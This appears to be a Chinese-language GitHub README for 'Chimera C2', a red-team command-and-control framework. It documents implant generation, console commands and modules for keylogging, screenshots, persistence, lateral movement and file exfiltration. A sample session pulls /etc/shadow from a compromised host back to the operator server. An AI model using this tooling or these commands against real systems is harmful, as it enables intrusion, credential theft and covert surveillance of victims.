Adam-ZS/Chimera-C2

# 🧬 Chimera C2 — 多传输命令与控制 Chimera 是一个功能齐全的 C2 框架，结合了服务端操作员控制台与跨平台 implant。它支持多种传输通道、加密通信以及模块化的后渗透工具包。 **适用场景：** 红队行动、对手模拟、后渗透评估。 ## 架构 ``` ┌──────────────┐ ┌──────────────────────┐ ┌──────────────┐ │ Operator │────▶│ Chimera Server │◀────│ Implant │ │ Console │◀────│ (Listener + Tasks) │────▶│ (Target) │ └──────────────┘ └──────────────────────┘ └──────────────┘ │ ┌───────┴───────┐ │ │ HTTPS:8443 DoH:8444 WebSocket:8445 ``` ## 功能 | 组件 | 功能 | |-----------|-------------| | **Server** | 多监听器（HTTPS、DNS-over-HTTPS、WebSocket）、任务队列、会话管理、交互式操作员控制台 | | **Implant** | Python/PowerShell/Bash 生成器、加密 beaconing、命令执行、模块系统 | | **Keylogger 模块** | 在目标上启动/停止/导出击键记录 | | **Screenshot 模块** | 带有自动外发功能的远程屏幕捕获 | | **Exfil 模块** | 通过加密通道从目标拉取文件 | | **Persistence 模块** | 注册表持久化（Windows） / crontab 持久化（Linux） | | **横向移动模块** | 将 implant 部署到相邻主机 | | **SOCKS Proxy 模块** | 通过受控主机路由流量 | | **Info 模块** | 详细的会话侦查 | ## 快速开始 ### 1. 启动 Server ``` # 克隆或下载 git clone https://github.com/Adam-ZS/chimera cd chimera # 启动 C2 server python3 chimera.py server --host 0.0.0.0 --port 8443 # 使用自定义加密密钥 python3 chimera.py server --host 0.0.0.0 --port 8443 --key "MyS3cr3tK3y!" # 自定义数据目录 python3 chimera.py server --host 0.0.0.0 --port 8443 --data-dir /opt/chimera_data ``` ### 2. 生成 Implant 在操作员控制台中： ``` chimera ❯ generate ═══ Generate Implant ═══ 1) Python (Linux/macOS/Windows) 2) PowerShell (Windows only) 3) Bash (Linux/macOS) Select type [1]: 1 LHOST [0.0.0.0]: 192.168.1.100 LPORT [8443]: 8443 Transport [https]: https Beacon interval (s) [10]: 5 ✔ Implant saved: chimera_data/payload_chimera_https.py ``` 或通过命令行： ``` # 以 generate-only 模式启动 server python3 chimera.py generate --host 192.168.1.100 --port 8443 --key "K3y!" ``` ### 3. 部署与交互 将生成的 implant 部署在目标上： ``` # Python implant (Linux/macOS/Windows) python3 payload_chimera_https.py ``` 返回操作员控制台： ``` chimera ❯ sessions ═══ Sessions (1) ═══ ID Hostname IP Last Seen ─────────────────────────────────────────────────────────────────────────── a1b2c3d4 DC01 192.168.1.10 2026-06-11 21:30 chimera ❯ use a1b2c3d4 ═══ Interacting with a1b2c3d4 ═══ Target: DC01 @ 192.168.1.10 OS: linux User: root Elevation: True Available modules: shell, keylog, screenshot, exfil, persist, lateral, info, kill, socks DC01 ❯ whoami [*] Running: whoami [+] stdout: root DC01 ❯ keylog start [+] Keylogger started on a1b2c3d4 DC01 ❯ screenshot [+] Capturing screenshot on a1b2c3d4... [+] Saved: chimera_data/exfil/a1b2c3d4_screen_1700000000.png DC01 ❯ exfil /etc/shadow [+] Exfiltrating /etc/shadow from a1b2c3d4... [+] Saved: chimera_data/exfil/shadow DC01 ❯ info Session: a1b2c3d4 hostname: DC01 user: root os: linux pid: 1234 elevated: True ip: 192.168.1.10 DC01 ❯ back chimera ❯ ``` ## Implant 类型 | 类型 | 平台 | 要求 | 持久化方法 | |------|----------|-------------|-------------------| | **Python** | Linux, macOS, Windows | Python 3.6+ | crontab / 注册表 / launchd | | **PowerShell** | Windows | PowerShell 5.0+ | 计划任务 / 注册表 | | **Bash** | Linux, macOS | bash, curl | crontab / systemd | ## 加密 所有 C2 流量均经过 XOR 加密和 base64 编码。Server 在启动时会生成一个 32 字符的随机密钥。Implant 必须使用相同的密钥才能进行通信。 ``` plaintext → XOR(key) → base64 → transport → base64 → XOR(key) → plaintext ``` 对于生产环境的部署，请替换为 AES-GCM（参见 `aes_branch`）。 ## 控制台命令 | 命令 | 描述 | |---------|-------------| | `sessions` | 列出活跃的 implant 会话 | | `use ` | 与会话进行交互 | | `listeners` | 显示活跃监听器状态 | | `generate` | 生成 implant payload | | `key` | 显示加密密钥 | | `clear` | 清除屏幕 | | `exit/quit` | 关闭 server | ### 会话命令 | 命令 | 描述 | |---------|-------------| | `shell ` | 执行系统命令 | | `keylog start/dump/stop` | 击键记录 | | `screenshot` | 远程屏幕捕获 | | `exfil [local]` | 文件外发 | | `lateral ` | 横向移动 | | `socks [port]` | SOCKS 代理 | | `persist [method]` | 安装持久化 | | `info` | 会话信息 | | `kill` | 终止 implant | | `back` | 返回主控制台 | ## 要求 - Python 3.6+ - 仅需标准库（server 模式） - 无外部依赖 ## OPSEC - 所有流量均通过加密传输路由 - Implant 按可配置的时间间隔进行 beaconing - 默认情况下，不会在目标上写入持久化文件 - 通过 server 命令控制紧急停止 - 通过受控主机进行 SOCKS 代理 ## 许可证 MIT ## 作者 **Adam-ZS** — Wraithe & Chimera 开发者

标签：AI合规, C2框架, IP 地址批量处理, PE 加载器, 命令与控制, 安全学习资源, 应用安全, 逆向工具